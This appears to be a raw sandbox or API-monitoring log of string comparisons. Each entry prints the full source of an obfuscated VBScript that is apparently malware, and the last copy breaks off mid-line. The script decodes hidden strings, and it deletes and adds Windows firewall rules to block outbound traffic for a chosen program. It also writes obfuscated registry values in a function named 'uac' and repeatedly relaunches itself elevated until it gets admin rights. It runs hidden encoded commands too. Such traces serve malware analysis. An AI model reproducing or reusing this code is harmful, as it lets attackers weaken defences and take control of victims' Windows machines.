ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.934] wcsncmp (_String1="Dim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0222.934] wcsncmp (_String1="im sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.934] wcsncmp (_String1="m sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0222.934] wcsncmp (_String1=" sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 